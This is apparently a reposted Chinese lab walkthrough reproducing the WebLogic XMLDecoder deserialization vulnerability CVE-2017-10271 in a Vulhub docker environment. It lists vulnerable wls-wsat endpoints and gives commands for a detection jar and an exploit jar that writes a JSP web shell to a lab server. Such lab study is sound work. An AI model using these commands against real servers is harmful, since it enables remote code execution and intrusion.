weblogic XMLDecoder反序列化 CVE-2017-10271 工具檢測+工具利用復現


被360眾測靶場殘虐,所以決定把這些常規漏洞(Vulhub)都學一下他們的利用。

環境:

docker   搭建weblogic  XMLDecoder反序列化環境 

kali虛擬機

本地物理機Win10  谷歌瀏覽器  Git Bash

工具:https://github.com/RealBearcat/Oracle-WebLogic-CVE-2017-10271

 

 環境搭建:

git clone https://github.com/vulhub/vulhub.git     #可以看到有很多漏洞環境

 

 

 我這個是從一個安裝包解壓來的,不過都是一樣的,上面給的方式更方便一些,如果你可以科學&上網的話。

cd vulhub/weblogic/CVE-2017-10271  #選中這一目錄  進去開啟漏洞環境

docker-compose  build  #此處出現過一個坑 有可能會報一下錯誤    

 

 

 錯誤原因是有一個編譯包中缺少一個py模塊,解決方式

docker-compose up -d   #部署開啟漏洞環境如下   要是不知道網址 可以ifconfig一下

  

 

 檢測:檢測其實不太重要,因為這個漏洞是weblogic系列的,大家一般都會有這一系的檢測工具

手動檢測:訪問這些目錄  出現下圖就說明大可能存在

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

 

 工具檢測:

java  -jar WebLogic-Wls-wsat-XMLDecoder.jar  -u http://192.168.80.1:7001

工具利用:寫命令shell

java  -jar  WebLogic_Wls-Wsat_RCE_Exp.jar http://192.168.80.129:7001 z.jsp    #后面的z.jsp名字可以自己起   jsp后綴不能變

 

 嘗試瀏覽器連接:

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM